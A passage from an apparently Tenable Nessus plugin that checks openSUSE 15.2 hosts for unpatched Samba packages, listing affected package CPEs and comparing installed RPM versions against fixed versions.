value:\"p-cpe:/a:novell:opensuse:libnetapi0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-credentials-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-credentials0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-credentials0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-credentials0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-credentials0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-errors-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-errors0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-errors0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-errors0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-errors0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-hostconfig-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-hostconfig0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-hostconfig0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-hostconfig0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-hostconfig0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-passdb-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-passdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-passdb0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-passdb0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-passdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy-python3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy0-python3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy0-python3-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy0-python3-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy0-python3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-util-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-util0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-util0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamdb-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamdb0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamdb0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbconf-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbconf0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbconf0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbconf0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbconf0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbldap-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbldap2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbldap2-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbldap2-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbldap2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-util-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-util0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-util0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-ad-dc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-ad-dc-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-ad-dc-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-ad-dc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-ceph\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-ceph-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-core-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-dsdb-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-dsdb-modules-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-python3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-python3-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-python3-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-python3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-python3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-python3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-test-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/09/30\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.2\", reference:\"ctdb-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"ctdb-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"ctdb-pcp-pmda-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"ctdb-pcp-pmda-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"ctdb-tests-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"ctdb-tests-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libdcerpc-binding0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libdcerpc-binding0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libdcerpc-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libdcerpc-samr-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libdcerpc-samr0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libdcerpc-samr0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libdcerpc0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libdcerpc0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr-krb5pac-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr-krb5pac0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr-krb5pac0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr-nbt-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr-nbt0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr-nbt0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr-standard-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr-standard0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr-standard0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libnetapi-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libnetapi0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libnetapi0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-credentials-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-credentials0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-credentials0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-errors-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-errors0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-errors0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-hostconfig-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-hostconfig0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-hostconfig0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-passdb-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-passdb0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-passdb0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-policy-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-policy-python3-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-policy0-python3-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-policy0-python3-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-util-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-util0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-util0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamdb-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamdb0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamdb0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsmbclient-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsmbclient0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsmbclient0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsmbconf-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsmbconf0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsmbconf0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsmbldap-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsmbldap2-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsmbldap2-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libtevent-util-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libtevent-util0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libtevent-util0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libwbclient-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libwbclient0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libwbclient0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-ad-dc-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-ad-dc-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-client-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-client-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-core-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-debugsource-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-dsdb-modules-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-dsdb-modules-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-libs-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-libs-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-libs-python3-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-libs-python3-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-python3-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-python3-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-test-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-test-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-winbind-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-winbind-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libdcerpc-binding0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libdcerpc-binding0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libdcerpc-samr0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libdcerpc-samr0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libdcerpc0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libdcerpc0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libndr-krb5pac0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libndr-krb5pac0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libndr-nbt0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libndr-nbt0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libndr-standard0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libndr-standard0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libndr0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libndr0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libnetapi-devel-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libnetapi0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libnetapi0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-credentials0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-credentials0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-errors0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-errors0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-hostconfig0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-hostconfig0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", 